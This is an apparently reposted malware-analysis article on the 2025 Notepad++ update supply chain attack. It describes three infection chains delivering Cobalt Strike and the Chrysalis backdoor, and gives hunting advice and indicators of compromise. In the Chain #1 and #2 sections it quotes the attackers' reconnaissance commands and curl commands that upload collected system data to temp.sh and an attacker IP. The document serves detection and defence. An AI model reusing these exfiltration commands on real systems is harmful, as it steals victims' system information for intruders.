{"id":1003,"date":"2026-02-03T09:04:28","date_gmt":"2026-02-03T09:04:28","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/"},"modified":"2026-02-03T09:04:28","modified_gmt":"2026-02-03T09:04:28","slug":"the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/","title":{"rendered":"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs"},"content":{"rendered":"<div>\n<p><img width=\"990\" height=\"400\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg\" class=\"attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image\" alt=\"\" decoding=\"async\" loading=\"lazy\"><\/p>\n<h2 id=\"introduction\">Introduction<\/h2>\n<p>On February 2, 2026, the developers of Notepad++, a text editor popular among developers, <a href=\"https:\/\/notepad-plus-plus.org\/news\/hijacked-incident-info-update\/\" target=\"_blank\">published a statement<\/a> claiming that the update infrastructure of Notepad++ has been compromised. According to the statement, this was due to a hosting provider level incident, which occurred from June to September 2025. However, attackers were able to retain access to internal services until December 2025.<\/p>\n<h2 id=\"multiple-execution-chains-and-payloads\">Multiple execution chains and payloads<\/h2>\n<p>Having checked our telemetry related to this incident, we have been amazed to find out how different and unique were the execution chains used in this supply chain attack. We identified that over the course of four months, from July to October 2025, attackers who have compromised Notepad++ have been constantly rotating C2 server addresses used for distributing malicious updates, the downloaders used for implant delivery, as well as the final payloads.<\/p>\n<p>We observed three different infection chains overall designed to attack about a dozen machines, belonging to:<\/p>\n<ul>\n<li>Individuals located in Vietnam, El Salvador and Australia;<\/li>\n<li>A government organization located in the Philippines;<\/li>\n<li>A financial organization located in El Salvador;<\/li>\n<li>An IT service provider organization located in Vietnam.<\/li>\n<\/ul>\n<p>Despite the variety of payloads observed, Kaspersky solutions have been able to block the identified attacks as they occurred.<\/p>\n<p>In this article, we describe the variety of the infection chains we observed in the Notepad++ supply chain attack, as well as provide numerous previously unpublished IoCs related to it. <\/p>\n<h3 id=\"chain-1-late-july-and-early-august-2025\">Chain #1 \u2014 late July and early August 2025<\/h3>\n<p>We observed attackers to deploy a malicious Notepad++ update for the first time in late July 2025. It was hosted at http:\/\/45.76.155[.]202\/update\/update.exe. Notably, the first scan  of this URL on the VirusTotal platform occurred in late September, by a user from Taiwan.<\/p>\n<p>The <code>update.exe<\/code> file downloaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the legitimate Notepad++ updater process, <code>GUP.exe<\/code>. This file turned out to be a NSIS installer, of about 1 MB in size. When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:<\/p>\n<ol>\n<li>The file creates a directory named <code>%appdata%ProShow<\/code> and sets it as the current directory;<\/li>\n<li>It executes the shell command <code>cmd \/c whoami&amp;&amp;tasklist &gt; 1.txt<\/code>, thus creating a file with the shell command execution results in the <code>%appdata%ProShow directory<\/code>;<\/li>\n<li>Then it uploads the <code>1.txt<\/code> file to the temp[.]sh hosting service by executing the <code>curl.exe -F \"file=@1.txt\" -s https:\/\/temp.sh\/upload<\/code> command;<\/li>\n<li>Next, it sends the URL to the uploaded <code>1.txt<\/code> file by using the <code>curl.exe --user-agent \"https:\/\/temp.sh\/ZMRKV\/1.txt\" -s http:\/\/45.76.155[.]202<\/code> shell command. As can be observed, the uploaded file URL is transferred inside the user agent.<\/li>\n<\/ol>\n<p>Notably, the same behavior of malicious Notepad++ updates, specifically the launch of shell commands and the use of the temp[.]sh website for file uploading, has been described  on the Notepad++ community forums by a user named soft-parsley.<br \/>\n<a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1.png\" class=\"magnificImage\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1.png\" alt=\"\" width=\"2048\" height=\"783\" class=\"aligncenter size-full wp-image-118712\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1.png 2048w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-300x115.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-1024x392.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-768x294.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-1536x587.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-915x350.png 915w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-740x283.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-732x280.png 732w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-800x306.png 800w\" sizes=\"(max-width: 2048px) 100vw, 2048px\"><\/a><br \/>\nAfter sending system information, the <code>update.exe<\/code> file executes the second-stage payload. To do that, it performs the following actions: <\/p>\n<ul>\n<li>Drops the following files to the <code>%appdata%ProShow<\/code> directory:\n<ul>\n<li><code>ProShow.exe<\/code> (SHA1: defb05d5a91e4920c9e22de2d81c5dc9b95a9a7c)<\/li>\n<li><code>defscr<\/code> (SHA1: 259cd3542dea998c57f67ffdd4543ab836e3d2a3)<\/li>\n<li><code>if.dnt<\/code> (SHA1: 46654a7ad6bc809b623c51938954de48e27a5618)<\/li>\n<li><code>proshow.crs<\/code> (SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709)<\/li>\n<li><code>proshow.phd<\/code> (da39a3ee5e6b4b0d3255bfef95601890afd80709)<\/li>\n<li><code>proshow_e.bmp<\/code> (SHA1: 9df6ecc47b192260826c247bf8d40384aa6e6fd6)<\/li>\n<li><code>load<\/code> (SHA1: 06a6a5a39193075734a32e0235bde0e979c27228)<\/li>\n<\/ul>\n<\/li>\n<li>Executes the dropped <code>ProShow.exe<\/code> file.<\/li>\n<\/ul>\n<p>The launched <code>ProShow.exe<\/code> file is a legitimate ProShow software, which is abused to launch a malicious payload. Normally, when threat actors aim to execute a malicious payload inside a legitimate process, they resort to the DLL sideloading technique. However, this time attackers have decided to avoid using it \u2014 likely due to how much attention this technique receives nowadays. Instead, they abused an old, known vulnerability in the ProShow software, which dates back to early 2010s. The dropped file named <code>load<\/code> contains an exploit payload, which is launched when the <code>ProShow.exe<\/code> file is launched. It is worth noting that, apart from this payload, all files in the <code>%appdata%ProShow<\/code> directory are legitimate.<\/p>\n<p>Analysis of the exploit payload revealed that it contains two shellcodes \u2014 one at the very start and the other one in the middle of the file. The shellcode located at the start of the file contains a set of meaningless instructions and is not designed to be executed \u2014 rather, attackers used it as the exploit padding bytes. It is likely that, by using a fake shellcode for padding bytes instead of something else (e.g., a sequence of <code>0x41<\/code> characters or random bytes), attackers aimed to confuse researchers and automated analysis systems. <\/p>\n<p>The second shellcode, which is stored in the middle of the file, is the one that is launched when <code>ProShow.exe<\/code> is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https:\/\/45.77.31[.]210\/users\/admin (user agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/138.0.0.0 Safari\/537.36) and launches it. <\/p>\n<p>The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https:\/\/45.77.31[.]210\/api\/update\/v1 and the POST request URL https:\/\/45.77.31[.]210\/api\/FileUpload\/submit.<\/p>\n<p>Later on, in early August 2025, we have observed attackers to use the same download URL for the <code>update.exe<\/code> files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same execution chain for delivery of Cobalt Strike Beacon via malicious Notepad++ updates. However, we noted the following differences:<\/p>\n<ul>\n<li>In the Metasploit downloader payload, the URL for downloading Cobalt Strike Beacon was set to https:\/\/cdncheck.it[.]com\/users\/admin;<\/li>\n<li>The Cobalt Strike C2 server URLs were set to https:\/\/cdncheck.it[.]com\/api\/update\/v1 and https:\/\/cdncheck.it[.]com\/api\/Metadata\/submit.<\/li>\n<\/ul>\n<p>We have not further seen any infections leveraging chain #1 after early August 2025.<\/p>\n<h3 id=\"chain-2-middle-and-end-of-september-2025\">Chain #2 \u2014 middle and end of September 2025<\/h3>\n<p>A month and a half after malicious update detections ceased, we observed attackers to resume deploying these updates in the middle of September 2025, using another infection chain. The malicious update was still being distributed from the http:\/\/45.76.155[.]202\/update\/update.exe URL, and the file downloaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS installer as well. However, its file size was now about 140 KB. Again, this file performed two actions:<\/p>\n<ul>\n<li>Obtained system information by executing a shell command and uploading its execution results to temp[.]sh;<\/li>\n<li>Dropped a next-stage payload on disk and launched it.<\/li>\n<\/ul>\n<p>Regarding system information, attackers made the following changes to how it was collected:<\/p>\n<ul>\n<li>They changed the working directory to %APPDATA%AdobeScripts;<\/li>\n<li>They started collecting more system information details, changing the executed shell command to <code>cmd \/c \"whoami&amp;&amp;tasklist&amp;&amp;systeminfo&amp;&amp;netstat -ano\" &gt; a.txt<\/code>.<\/li>\n<\/ul>\n<p>The created <code>a.txt<\/code> file was, just as in the case of stage #1, uploaded to the temp[.]sh website through curl, with the obtained temp[.]sh URL being transferred to the same http:\/\/45.76.155[.]202\/list endpoint, inside the User-Agent header.<\/p>\n<p>As for the next-stage payload, it has been changed completely. The NSIS installer was configured to drop the following files to the %APPDATA%AdobeScripts directory:<\/p>\n<ul>\n<li><code>alien.dll<\/code> (SHA1: 6444dab57d93ce987c22da66b3706d5d7fc226da);<\/li>\n<li><code>lua5.1.dll<\/code> (SHA1: 2ab0758dda4e71aee6f4c8e4c0265a796518f07d);<\/li>\n<li><code>script.exe<\/code> (SHA1: bf996a709835c0c16cce1015e6d44fc95e08a38a);<\/li>\n<li><code>alien.ini<\/code> (SHA1: ca4b6fe0c69472cd3d63b212eb805b7f65710d33).<\/li>\n<\/ul>\n<p>Next, it executes the following shell command to launch the script.exe file: <code>%APPDATA%%AdobeScriptsscript.exe %APPDATA%AdobeScriptsalien.ini<\/code>.<\/p>\n<p>All of the files in the <code>%APPDATA%AdobeScripts<\/code> directory, except for <code>alien.ini<\/code>, are legitimate and related to the Lua interpreter. As such, the previously mentioned command is used by attackers to launch a compiled Lua script, located in the <code>alien.ini<\/code> file.  Below is a screenshot of its decompilation:<br \/>\n<a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2.png\" alt=\"\" width=\"560\" height=\"291\" class=\"aligncenter size-full wp-image-118713\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2.png 560w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2-300x156.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2-539x280.png 539w\" sizes=\"auto, (max-width: 560px) 100vw, 560px\"><\/a><br \/>\nAs we can see, this small script is used for placing shellcode inside executable memory and then launching it through the <code>EnumWindowStationsW<\/code> API function.<\/p>\n<p>The launched shellcode is, just in the case of chain #1, a Metasploit downloader, which downloads a Cobalt Strike Beacon payload, again in the form of a shellcode, from the https:\/\/cdncheck.it[.]com\/users\/admin URL.<\/p>\n<p>The Cobalt Strike payload contains the C2 server URLs that slightly differ from the ones seen previously: https:\/\/cdncheck.it[.]com\/api\/getInfo\/v1 and https:\/\/cdncheck.it[.]com\/api\/FileUpload\/submit.<\/p>\n<p>Attacks involving chain #2 continued until the end of September, when we observed two more malicious <code>update.exe<\/code> files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon payload delivered through it was configured to use the same URLs observed in mid-September, however, attackers changed the way system information was collected. Specifically, attackers split the single shell command they used for this (<code>cmd \/c \"whoami&amp;&amp;tasklist&amp;&amp;systeminfo&amp;&amp;netstat -ano\" &gt; a.txt<\/code>) into multiple commands:<\/p>\n<ul>\n<li><code>cmd \/c whoami &gt;&gt; a.txt<\/code><\/li>\n<li><code>cmd \/c tasklist &gt;&gt; a.txt<\/code><\/li>\n<li><code>cmd \/c systeminfo &gt;&gt; a.txt<\/code><\/li>\n<li><code>cmd \/c netstat -ano &gt;&gt; a.txt<\/code><\/li>\n<\/ul>\n<p>Notably, the same sequence of commands has been previously documented by the soft-parsley user on the Notepad++ community forums.<\/p>\n<p>The other <code>update.exe<\/code> file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. Using it, attackers performed the following:<\/p>\n<ul>\n<li>Changed the system information upload URL to https:\/\/self-dns.it[.]com\/list;<\/li>\n<li>Changed the user agent used in HTTP requests to Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/140.0.0.0 Safari\/537.36;<\/li>\n<li>Changed the URL used by the Metasploit downloader to https:\/\/safe-dns.it[.]com\/help\/Get-Start;<\/li>\n<li>Changed the Cobalt Strike Beacon C2 server URLs to https:\/\/safe-dns.it[.]com\/resolve and https:\/\/safe-dns.it[.]com\/dns-query.<\/li>\n<\/ul>\n<h3 id=\"chain-3-october-2025\">Chain #3 \u2014 October 2025<\/h3>\n<p>In early October 2025, attackers changed the infection chain once again. They have as well changed the C2 server for distributing malicious updates, with the observed update URL being http:\/\/45.32.144[.]255\/update\/update.exe. The payload downloaded (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) was still a NSIS installer, however, unlike in the case of chains 1 and 2, this installer did not include the system information sending functionality. It simply dropped the following files to the <code>%appdata%Bluetooth<\/code> directory:<\/p>\n<ul>\n<li><code>BluetoothService.exe<\/code>, a legitimate executable (SHA1: 21a942273c14e4b9d3faa58e4de1fd4d5014a1ed);<\/li>\n<li><code>log.dll<\/code>, a malicious DLL (SHA1: f7910d943a013eede24ac89d6388c1b98f8b3717);<\/li>\n<li><code>BluetoothService<\/code>, an encrypted shellcode (SHA1: 7e0790226ea461bcc9ecd4be3c315ace41e1c122).<\/li>\n<\/ul>\n<p>This execution chain relies on the sideloading of the <code>log.dll<\/code> file, which is responsible for launching the encrypted <code>BluetoothService<\/code> shellcode into the <code>BluetoothService.exe<\/code> process. Notably, such execution chains are commonly used by Chinese-speaking threat actors. This particular execution chain <a href=\"https:\/\/www.rapid7.com\/blog\/post\/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit\/\" target=\"_blank\">has already been described by Rapid7<\/a>, and the final payload observed in it is the custom Chrysalis backdoor. <\/p>\n<p>Unlike the previous chains, chain #3 does not load a Cobalt Strike Beacon directly. However, in their article Rapid7 claim that they additionally observed a Cobalt Strike Beacon payload being deployed to the <code>C:ProgramDataUSOShared<\/code> folder, while conducting incident response on one of the machines infected with the Notepad++ supply chain attack. Whilst Rapid7 does not detail how this file was dropped to the victim machine, we can highlight the following similarities between that Beacon payload and the Beacon payloads observed in chains #1 and #2:<\/p>\n<ol>\n<li>In both cases, Beacons are loaded through a Metasploit downloader shellcode, with similar URLs used (api.wiresguard.com\/users\/admin for the Rapid7 payload, cdncheck.it.com\/users\/admin and http:\/\/45.77.31[.]210\/users\/admin for chain #1 and chain #2 payloads);<\/li>\n<li>The Beacon configurations are encrypted with the XOR key <code>CRAZY<\/code>;<\/li>\n<li>Similar C2 server URLs are used for Cobalt Strike Beacon communications (i.e. api.wiresguard.com\/api\/FileUpload\/submit for the Rapid7 payload and https:\/\/45.77.31[.]210\/api\/FileUpload\/submit for the chain #1 payload).<\/li>\n<\/ol>\n<h3 id=\"return-of-chain-2-and-changes-in-urls-october-2025\">Return of chain #2 and changes in URLs \u2014 October 2025<\/h3>\n<p>In mid-October 2025, we observed attackers to resume deployments of the chain #2 payload (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) using yet another URL: http:\/\/95.179.213[.]0\/update\/update.exe. Still, this payload used the previously mentioned self-dns.it[.]com  and safe-dns.it[.]com domain names for system information uploading, Metasploit downloader and Cobalt Strike Beacon communications.<\/p>\n<p>Further in late October 2025, we observed attackers to start changing URLs used for malicious update deliveries. Specifically, attackers started using the following URLs:<\/p>\n<ul>\n<li>http:\/\/95.179.213[.]0\/update\/install.exe;<\/li>\n<li>http:\/\/95.179.213[.]0\/update\/update.exe;<\/li>\n<li>http:\/\/95.179.213[.]0\/update\/AutoUpdater.exe.<\/li>\n<\/ul>\n<p>We haven\u2019t observed any new payloads deployed from these URLs \u2014 they involved usage of both #2 and #3 execution chains. Finally, we have not seen any payloads being deployed starting from November 2025.<\/p>\n<h2 id=\"conclusion\">Conclusion<\/h2>\n<p>Notepad++ is a text editor used by numerous developers. As such, the ability to control update servers of this software gave attackers a unique possibility to break into machines of high-profile organizations around the world. The attackers made an effort to avoid losing access to this infection vector \u2014 they were spreading the malicious implants in a targeted manner, and they were skilled enough to drastically change the infection chains about once a month. Whilst we identified three distinct infection chains during our investigation, we would not be surprised to see more of them in use. To sum up our findings, here is the overall timeline of the infection chains that we identified:<br \/>\n<a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled.png\" alt=\"\" width=\"2578\" height=\"659\" class=\"aligncenter size-full wp-image-118714\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled.png 2578w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-300x77.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-1024x262.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-768x196.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-1536x392.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-2048x523.png 2048w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-1370x350.png 1370w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-740x189.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-1096x280.png 1096w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-800x204.png 800w\" sizes=\"auto, (max-width: 2578px) 100vw, 2578px\"><\/a><br \/>\nThe variety of infection chains makes detection of the Notepad++ supply chain attack quite a difficult and at the same time creative task. We would like to propose the following methods, from generic to specific, to hunt down traces of this attack:<\/p>\n<ul>\n<li>Check systems for deployments of NSIS installers, which have been used in all three observed execution chains. For example, this can be done by looking for logs related to creations of the <code>%localappdata%Tempns.tmp<\/code> directory, made by NSIS installers at runtime. Make sure to investigate the origins of each identified NSIS installer to avoid false positives;<\/li>\n<li>Check network traffic logs for DNS resolutions of the temp[.]sh domain, which is unusual to observe in corporate environments. Also, it is beneficial to conduct a check for raw HTTP traffic requests that have a temp[.]sh URL embedded in the user agent \u2014 both these steps will make it possible to detect chain #1 and chain #2 deployments;<\/li>\n<li>Check systems for launches of malicious shell commands referenced in the article, such as <code>whoami<\/code>, <code>tasklist<\/code>, <code>systeminfo<\/code> and <code>netstat -ano<\/code>;<\/li>\n<li>Use specific IoCs listed below to identify known malicious domains and files.<\/li>\n<\/ul>\n<h2 id=\"indicators-of-compromise\">Indicators of compromise<\/h2>\n<p>URLs used for malicious Notepad++ update deployments<br \/>\nhttp:\/\/45.76.155[.]202\/update\/update.exe<br \/>\nhttp:\/\/45.32.144[.]255\/update\/update.exe<br \/>\nhttp:\/\/95.179.213[.]0\/update\/update.exe<br \/>\nhttp:\/\/95.179.213[.]0\/update\/install.exe<br \/>\nhttp:\/\/95.179.213[.]0\/update\/AutoUpdater.exe<\/p>\n<p>System information upload URLs<br \/>\nhttp:\/\/45.76.155[.]202\/list<br \/>\nhttps:\/\/self-dns.it[.]com\/list<\/p>\n<p>URLs used by Metasploit downloaders to deploy Cobalt Strike beacons<br \/>\nhttps:\/\/45.77.31[.]210\/users\/admin<br \/>\nhttps:\/\/cdncheck.it[.]com\/users\/admin<br \/>\nhttps:\/\/safe-dns.it[.]com\/help\/Get-Start<\/p>\n<p>URLs used by Cobalt Strike Beacons delivered by malicious Notepad++ updaters<br \/>\nhttps:\/\/45.77.31[.]210\/api\/update\/v1<br \/>\nhttps:\/\/45.77.31[.]210\/api\/FileUpload\/submit<br \/>\nhttps:\/\/cdncheck.it[.]com\/api\/update\/v1<br \/>\nhttps:\/\/cdncheck.it[.]com\/api\/Metadata\/submit<br \/>\nhttps:\/\/cdncheck.it[.]com\/api\/getInfo\/v1<br \/>\nhttps:\/\/cdncheck.it[.]com\/api\/FileUpload\/submit<br \/>\nhttps:\/\/safe-dns.it[.]com\/resolve<br \/>\nhttps:\/\/safe-dns.it[.]com\/dns-query<\/p>\n<p>URLs used by the Chrysalis backdoor and the Cobalt Strike Beacon payloads associated with it, as previously identified by Rapid7<br \/>\nhttps:\/\/api.skycloudcenter[.]com\/a\/chat\/s\/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821<br \/>\nhttps:\/\/api.wiresguard[.]com\/update\/v1<br \/>\nhttps:\/\/api.wiresguard[.]com\/api\/FileUpload\/submit<\/p>\n<p>URLs related to Cobalt Strike Beacons uploaded to multiscanners, as previously identified by Rapid7<br \/>\nhttp:\/\/59.110.7[.]32:8880\/uffhxpSy<br \/>\nhttp:\/\/59.110.7[.]32:8880\/api\/getBasicInfo\/v1<br \/>\nhttp:\/\/59.110.7[.]32:8880\/api\/Metadata\/submit<br \/>\nhttp:\/\/124.222.137[.]114:9999\/3yZR31VK<br \/>\nhttp:\/\/124.222.137[.]114:9999\/api\/updateStatus\/v1<br \/>\nhttp:\/\/124.222.137[.]114:9999\/api\/Info\/submit<br \/>\nhttps:\/\/api.wiresguard[.]com\/users\/system<br \/>\nhttps:\/\/api.wiresguard[.]com\/api\/getInfo\/v1<\/p>\n<p>Malicious updater.exe hashes<br \/>\n8e6e505438c21f3d281e1cc257abdbf7223b7f5a<br \/>\n90e677d7ff5844407b9c073e3b7e896e078e11cd<br \/>\n573549869e84544e3ef253bdba79851dcde4963a<br \/>\n13179c8f19fbf3d8473c49983a199e6cb4f318f0<br \/>\n4c9aac447bf732acc97992290aa7a187b967ee2c<br \/>\n821c0cafb2aab0f063ef7e313f64313fc81d46cd<\/p>\n<p>Hashes of malicious auxiliary files<br \/>\n06a6a5a39193075734a32e0235bde0e979c27228 \u2014 load<br \/>\n9c3ba38890ed984a25abb6a094b5dbf052f22fa7 \u2014 load<br \/>\nca4b6fe0c69472cd3d63b212eb805b7f65710d33 \u2014 alien.ini<br \/>\n0d0f315fd8cf408a483f8e2dd1e69422629ed9fd \u2014 alien.ini<br \/>\n2a476cfb85fbf012fdbe63a37642c11afa5cf020 \u2014 alien.ini<br \/>\nMalicious file hashes, as identified by Rapid7<br \/>\nd7ffd7b588880cf61b603346a3557e7cce648c93<br \/>\n94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8<br \/>\n21a942273c14e4b9d3faa58e4de1fd4d5014a1ed<br \/>\n7e0790226ea461bcc9ecd4be3c315ace41e1c122<br \/>\nf7910d943a013eede24ac89d6388c1b98f8b3717<br \/>\n73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf<br \/>\nbd4915b3597942d88f319740a9b803cc51585c4a<br \/>\nc68d09dd50e357fd3de17a70b7724f8949441d77<br \/>\n813ace987a61af909c053607635489ee984534f4<br \/>\n9fbf2195dee991b1e5a727fd51391dcc2d7a4b16<br \/>\n07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51<br \/>\n3090ecf034337857f786084fb14e63354e271c5d<br \/>\nd0662eadbe5ba92acbd3485d8187112543bcfbf5<br \/>\n9c0eff4deeb626730ad6a05c85eb138df48372ce<\/p>\n<p>Malicious file paths<br \/>\n%appdata%ProShowload<br \/>\n%appdata%AdobeScriptsalien.ini<br \/>\n%appdata%BluetoothBluetoothService<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Introduction On February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement claiming that the update infrastructure of Notepad++ has been compromised. According to the statement, this was due to a hosting provider level incident, which occurred from June to September 2025. However, attackers were able to retain access [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[575,90,574,248,559,99,232,233,311,561,257],"tags":[91],"class_list":["post-1003","post","type-post","status-publish","format-standard","hentry","category-cobaltstrike","category-cybersecurity","category-dll-sideloading","category-great-research","category-incidents","category-malware","category-malware-descriptions","category-malware-technologies","category-shellcode","category-supply-chain-attack","category-windows-malware","tag-cybersecurity"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"Introduction On February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement claiming that the update infrastructure of Notepad++ has been compromised. According to the statement, this was due to a hosting provider level incident, which occurred from June to September 2025. However, attackers were able to retain access [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-03T09:04:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new 